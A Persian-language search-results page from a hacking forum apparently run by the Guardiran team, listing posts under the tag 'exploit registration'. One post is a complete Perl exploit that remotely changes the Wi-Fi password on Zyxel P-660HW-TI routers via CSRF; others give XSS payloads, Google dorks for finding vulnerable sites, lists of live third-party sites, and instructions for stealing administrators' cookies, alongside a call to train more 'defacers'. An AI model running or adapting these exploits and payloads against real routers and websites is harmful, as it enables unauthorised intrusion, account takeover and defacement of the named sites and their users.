جستجو در تالار

در حال نمایش نتایج برای برچسب های 'ثبت اکسپلویت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

7 نتیجه پیدا شد

  1. سلام خدمت اعضا محترم گارد ایران. خوب در این پست بنده قصد دارم که اکسپلویت نویسی رو به شما عزیزان آموزش بدم. بعضی از دوستان میپرسیدن که چطوری اکسپلویت ثبت میکنی و باگ پیدا میکنی و.. به همین خاطر تصمیم به ساخت این مجموعه گرفتم. خوب من از جناب گوگل برای ثبت اکسپلویت استفاده میکنم ولی اگر استقابال بشه از ابزارهای لینوکس هم میزارم. اهداف بنده از ایجاد این تاپیک: 1-کمک به افزایش سطح علمی عزیزان گارد ایران. 2-بالابردن تیم در بین تیم ها ثبت اکسپلویت 3-افزایش روز به روز تعداد اکسپلویتر و دیفیسر های تیم. اموزش پیدا کردن باگ هایxss,lfi,sql,shell upload,..در cms های مختلف==>اکسپلویت کردن==>ریپورت دادن=ثبت شدن باگ خوب دوستان گفته باشم استقبال نشه تاپیک دیر به دیر آپدیت میشه. به امید روزی که نام تک تک شما عزیزان رو در بخش ثبت اکسپلویت ببینیم.
  2. ثبت اکسپلویت ( Zyxel P-660HW-TI V3 ADSL CSRF ( change password #!/usr/bin/perl ########################################################### # Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password ) # Author : dr-iman/GIST # Exploit Type : Perl/Remote # Date : 3 Feb 2018 # Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3 # Tested : Ubuntu - Windows 10 # GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X ########################################################### # Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless. # The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field # Items needed : Wirelesss ADSL IP , NeW Password # There Is 3 Update For This ADSL Router . All versions are vulnerable use LWP::Simple; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); use HTTP::Request::Common qw(GET); use IO::Socket; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _____ _ _____ _ _ _ |__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _| |_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_| |___| |_| logo print "\nEner IP Address : "; $ip=<>; chomp($ip); print "\nEnter New Passwword : "; $pass=<>; chomp($pass); $url = "$ip/wzPPP.html"; my $content = $ua->get("$url")->content; if ($content =~ /Internet Configuration/ ) { my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]); } my $content = $ua->get("$wan")->content; my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]); my $content = $ua->get("$wan2")->content; my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]); my $content = $ua->get("$lan")->content; my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]); if ($fin =~ /Congratulations/) { print "\nPassword Changed Successfully !\n"; } else{ print "\nProcess Failed !!\n"; }
  3. ثبت اکسپلویت Rare Creative Group Cross Site Scripting Vulnerability به نام تیم امنیتی گارد ایران http://iedb.ir/exploits-5728.html ########################### # Rare Creative Group Cross Site Scripting Vulnerability ########################### * Title: Rare Creative Group Cross Site Scripting * date: 8/20/2016 * Exploit Author : Guardiran Security Team * Google Dork : intext:\"Website by Rare Creative Group\" * Vendor Homepage: http://www.rarecreativegroup.com/ * Version : All Version * Tested On : Kali Linux w3af / Windows 8.1 HEllo Guys. This Is a Xss Vulnerability You Can Run Your Scipts In Search Box [ /search/ ] ------------------ Description XSS: This CMS And Have Xss Vulnerability. We Cnd Run Our Script In Search Box. PoC : Page vulnerable : [ Search Box ] Ex : \"><marquee><h1>Test_Xss</h1></marquee> Demo: http://www.cloud.co.uk/ http://www.eureka.pl/profesjonalne/cloud_audio.htm http://warehousesound.com/clopm4sa.htm * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , MR.IMAN , reza attacker , Comrade , dastmale-sorkh , 1TED , Reza Attacker , J.ALL_Editor * Discovered By : MR.IMAN * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-21] ###########################
  4. با سلام خدمت دوستان. خوب چند وقتی بود از دنیای باگ ها فاصله گرفته بودم. امروز برگشتم. ثبت اکسپلویت Dchat Service Cross Site Scripting به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2016030063 * Exploit Title: Dchat Service Cross Site Scripting * Discovery Date: 2016/03/10 * Dork: intext: intext:"طراحی قالب اختصاصی توسط : دی چت" * Public Disclosure Date: 2016/03/12 * Exploit Author: Guardiran Security Team * Contact: https: http://guardiran.org/forums * Vendor Homepage: http://dchat.org/ * Software Link: [-] * Version: All Version * Tested on: Dchat Chatrooms * Category: webapps Description ====================================================================== About Dchat Service: Dchat is a chat service provider. Dchat the best service provider with high security and Support 24-hour Cross-site scripting vulnerability occurs in private chat panel We can use this panel to bring the cookies of each user Exploit: The First We Have To Register With Commom User Next you need a user (such as chat General Manager) select and use a private chat panel Then, using a script placed to extract cookies do Hacking Website Good Luck PoC ====================================================================== XSS ~~~~~~~~~~~~~~ method="post" Function=Panel Private Messages Accept: aplication/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 content-Type: Application/x-www-from-urlencoded; charset=UTF-8 -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Payload: ====================================================================== <script>alert('Xss')</script> or "><script>alert('Xss')</script> Demo: ====================================================================== * http://www.emrischat.org/ * http://www.yashilchat.com/ * http://www.toranchat.ir/ * http://www.faytunchat.com/ * http://www.metanatchat.ir/ * Discovered By :MR.IMAN * We Are Guardiran Security Team * Special Tnx: C0d3!nj3ct!0n , REX , MR.IMAN , GrYpHoN , alizombie , ColEctOR , * MRSEZAR And All Of member's Guardiran Security Team موفق باشید
  5. درود کشف باگ SQL Injection Web Vulnerability در Mangallam CMS توسط تیم امنیتی گارد ایران و لینکهای اثبات رو براتون قرار دام : . لینک اثبات exploit-db http://www.exploit-db.com/exploits/35899 لینک اثبات vulnerability-lab http://vulnerability-lab.com/get_content.php?id=1421 صفحه اکسپلویتهای ثبت شده بنام تیم امنیتی گارد ایران در vulnerability-lab.com http://vulnerability-lab.com/show.php?user=GuardIran%20Securit . با آرزوی موفقیت های روزافزون برای تمامیه اعضاء محترم تیم امنیتی گارد ایران .
  6. درود ثبت اکسپلویت Newtontree it services CMS Sql Injection Vulnerability توسط تیم امنیتی گارد ایران و جای داره از کاربر خوبمون *diamond* عزیز هم تشکر ویژه ای داشته باشیم . لینک اثبات : . http://iedb.ir/author-GuardIran%20Security%20Team.html . با آرزوی موفقیت و بهروزی برای تمامیه عزیزان در عرصه امنیت سایبرکشور
  7. کشف باگ در Blitz CMS و ثبت توسط تیم امنیتی گارد ایران . http://packetstormsecurity.com/files/129949/Blitz-CMS-SQL-Injection.html http://vulnerability-lab.com/get_content.php?id=1402 انشاا.. در فرصتهای بعدی اخبار و برخی از پروژه های تیم رو پابلیک می کنیم .